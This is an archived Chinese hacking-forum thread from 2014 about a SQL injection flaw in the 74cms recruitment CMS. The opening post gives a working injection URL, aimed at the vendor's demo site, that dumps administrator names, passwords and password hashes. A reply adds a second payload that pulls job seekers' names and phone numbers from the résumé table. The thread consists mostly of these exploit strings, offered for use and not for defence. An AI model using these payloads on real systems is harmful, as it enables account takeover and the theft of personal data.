74cms最新通杀注入漏洞

90_ 发表于 2014-5-29 13:25:17

作者：暂时不知道

74官方测试：

Exp：
http://demo.74cms.com/plus/ajax_common.php?act=hotword&query=%E9%8C%A6%27union+/*!50000SeLect*/+1,group_concat%28admin_name,0x3a,pwd,0x3a,pwd_hash%29,3+from+qs_admin%23

vivi 发表于 2014-5-29 14:06:53

多谢管理员分享。

vivi 发表于 2014-5-29 16:06:46

可是密码是个问题！
这个是获取用户资料信息的exp：
plus/ajax_officebuilding.php?act=key&key=s%E9%8C%A6%27%20or%201=1%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,concat(0x3C623E5E5F5E203C2F623E,id,fullname,telephone,0x3C623E205E5F5E3C2F623E),9%20from%20qs_resume%23

system_c 发表于 2014-5-30 14:04:40

Puppet。 发表于 2014-7-7 23:09:52

页: [1]

红客联盟 - 由08安全团队运营's Archiver

74cms最新通杀注入漏洞